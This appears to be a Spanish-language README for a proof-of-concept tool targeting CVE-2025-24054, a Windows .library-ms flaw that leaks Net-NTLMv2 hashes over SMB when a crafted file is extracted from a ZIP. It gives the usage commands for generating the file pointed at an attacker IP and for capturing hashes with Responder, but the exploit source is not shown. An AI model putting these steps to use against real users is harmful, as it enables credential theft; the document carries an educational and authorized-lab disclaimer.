
Prueba de concepto para CVE-2025-24054, una vulnerabilidad de divulgación de hash NTLM de Windows Library (.library-ms). Genera un archivo .library-ms malicioso para filtrar hashes Net-NTLMv2 a través de SMB cuando se extrae de un archivo ZIP.
Una simple prueba de concepto para CVE-2025-24054 – Vulnerabilidad de Divulgación de Hash NTLM de Windows Library (.library-ms).
⚠️ Solo para uso educativo y en laboratorios autorizados
CVE-2025-24054 permite a un atacante forzar a un sistema Windows a filtrar el hash Net-NTLMv2 de la víctima mediante un archivo .library-ms especialmente manipulado.
Cuando la víctima extrae un ZIP que contiene el archivo .library-ms malicioso, el Explorador de Windows inicia automáticamente una conexión SMB, filtrando el hash NTLM.
.library-ms malicioso que contiene una ruta UNC que apunta a su máquina.
python poc.py -i YOUR-IP
sudo responder -I eth0